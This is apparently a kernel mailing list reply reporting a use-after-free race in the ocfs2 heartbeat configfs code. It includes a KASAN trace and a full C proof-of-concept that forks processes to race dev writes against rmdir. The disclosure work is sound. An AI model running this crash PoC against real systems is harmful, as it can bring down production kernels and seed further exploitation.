Re: [PATCH] ocfs2/cluster: reject local node clears while heartbeat runs

From: XIAO WU

Date: Sun Jun 21 2026 - 07:17:42 EST


Hi Cen,

I saw the discussion with Joseph about the v2 fixes.  Before v2 goes out,
I wanted to flag a pre-existing race condition that a Sashiko AI code
review [1] found in the same function.

The `o2hb_region_dev_store()` error path can race with
`o2hb_heartbeat_group_drop_item()` (triggered by rmdir) because configfs
allows concurrent store() and drop_item().  If drop_item() tears down the
region while dev_store is in its error path, the subsequent
`fput(reg->hr_bdev_file)` hits a use-after-free.

I was able to reproduce this in QEMU with KASAN by forking multiple
children to race dev_store writes against rmdir on the same heartbeat
region.

On Sun, Jun 14, 2026 at 01:33:45PM +0800, Cen Zhang wrote:
> Track the heartbeat start/run/stop window with a per-region active
> flag protected by o2hb_live_lock. This prevents o2nm_node_local_store()
> from clearing the local node while heartbeat threads are still active.

The `hr_heartbeat_active` flag protects against the node clear race,
but the error path in `dev_store` can still race with `drop_item()`
via configfs concurrency:

```c
// dev_store() error path after configfs has accepted the write:
// at this point, drop_item() can run in parallel via rmdir
fput(reg->hr_bdev_file);  // UAF if drop_item() already freed it
```

[KASAN report — kernel 7.1.0-rc7-next-20260612, CONFIG_KASAN=y]

  BUG: KASAN: null-ptr-deref in fput+0x33/0x100
  BUG: kernel NULL pointer dereference, address: 0000000000000158
  Oops: Oops: 0002 [#1] SMP KASAN NOPTI

  Call Trace:
   <TASK>
   fput+0x33/0x100
   o2hb_region_dev_store+0x1327/0x1da0
   configfs_write_iter+0x.../...
   vfs_write+0x.../...
   ksys_write+0x.../...
   do_syscall_64+0xcd/0xf80
   entry_SYSCALL_64_after_hwframe+0x77/0x7f

The crash is `fput()` on a region that was already freed by a concurrent
`drop_item()`.  The `dev_store` error path calls `fput(reg->hr_bdev_file)`,
but `drop_item()` already tore down the region via rmdir — the NULL deref
is the symptom of the use-after-free.

Full PoC source (poc.c):
---8<----------------------------------------------------------------
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <string.h>
#include <stdlib.h>

#define CFG "/sys/kernel/config/cluster/poccluster"

int main(void)
{
    char p[256], loopdev[64] = "/dev/loop0";
    printf("[*] OCFS2 heartbeat PoC\n");

    system("dd if=/dev/zero of=/tmp/hb.img bs=1M count=30 2>/dev/null");
    system("losetup -f /tmp/hb.img 2>/dev/null");
    FILE *fp = popen("losetup -j /tmp/hb.img -O NAME "
                     "--noheadings 2>/dev/null", "r");
    if (fp && fgets(loopdev, sizeof(loopdev), fp))
        loopdev[strcspn(loopdev, "\n")] = 0;
    if (fp) pclose(fp);

    snprintf(p, sizeof(p), CFG); mkdir(p, 0755);
    snprintf(p, sizeof(p), CFG "/node/mynode"); mkdir(p, 0755);
    int fd = open(CFG "/node/mynode/ipv4_address", O_WRONLY);
    if (fd >= 0) { write(fd, "127.0.0.1", 9); close(fd); }
    fd = open(CFG "/node/mynode/ipv4_port", O_WRONLY);
    if (fd >= 0) { write(fd, "7777", 4); close(fd); }
    fd = open(CFG "/node/mynode/num", O_WRONLY);
    if (fd >= 0) { write(fd, "0", 1); close(fd); }
    fd = open(CFG "/node/mynode/local", O_WRONLY);
    if (fd >= 0) { write(fd, "1", 1); close(fd); }

    for (int i = 0; i < 100; i++) {
        snprintf(p, sizeof(p), CFG "/heartbeat/reg");
        if (mkdir(p, 0755) < 0) { rmdir(p); usleep(1000); continue; }

        fd = open(CFG "/heartbeat/reg/block_bytes", O_WRONLY);
        if (fd >= 0) { write(fd, "512", 3); close(fd); }
        fd = open(CFG "/heartbeat/reg/start_block", O_WRONLY);
        if (fd >= 0) { write(fd, "1", 1); close(fd); }
        fd = open(CFG "/heartbeat/reg/blocks", O_WRONLY);
        if (fd >= 0) { write(fd, "4", 1); close(fd); }

        int loop_fd = open(loopdev, O_RDWR);
        if (loop_fd < 0) { usleep(1000); continue; }

        pid_t pids[7];
        for (int j = 0; j < 7; j++) {
            pids[j] = fork();
            if (pids[j] == 0) {
                if (j < 4) {
                    /* dev_store writers */
                    usleep(j * 20);
                    char fdstr[16];
                    snprintf(fdstr, sizeof(fdstr), "%d", loop_fd);
                    snprintf(p, sizeof(p), CFG "/heartbeat/reg/dev");
                    int dev_fd = open(p, O_WRONLY);
                    if (dev_fd >= 0) {
                        write(dev_fd, fdstr, strlen(fdstr));
                        close(dev_fd);
                    }
                } else {
                    /* rmdir — triggers drop_item() */
                    usleep(j * 30);
                    snprintf(p, sizeof(p), CFG "/heartbeat/reg");
                    rmdir(p);
                }
                _exit(0);
            }
        }
        close(loop_fd);
        for (int j = 0; j < 7; j++) { int st; waitpid(pids[j], &st, 0); }
        snprintf(p, sizeof(p), CFG "/heartbeat/reg"); rmdir(p);
    }
    printf("[*] Done. Check dmesg.\n");
    return 0;
}
---8<----------------------------------------------------------------
Compile: gcc -o poc poc.c

[1] https://sashiko.dev/#/patchset/20260614053345.64053-1-zzzccc427%40gmail.com
    (Sashiko AI code review — "Use-After-Free", Severity: Critical)

Thanks,
XIAO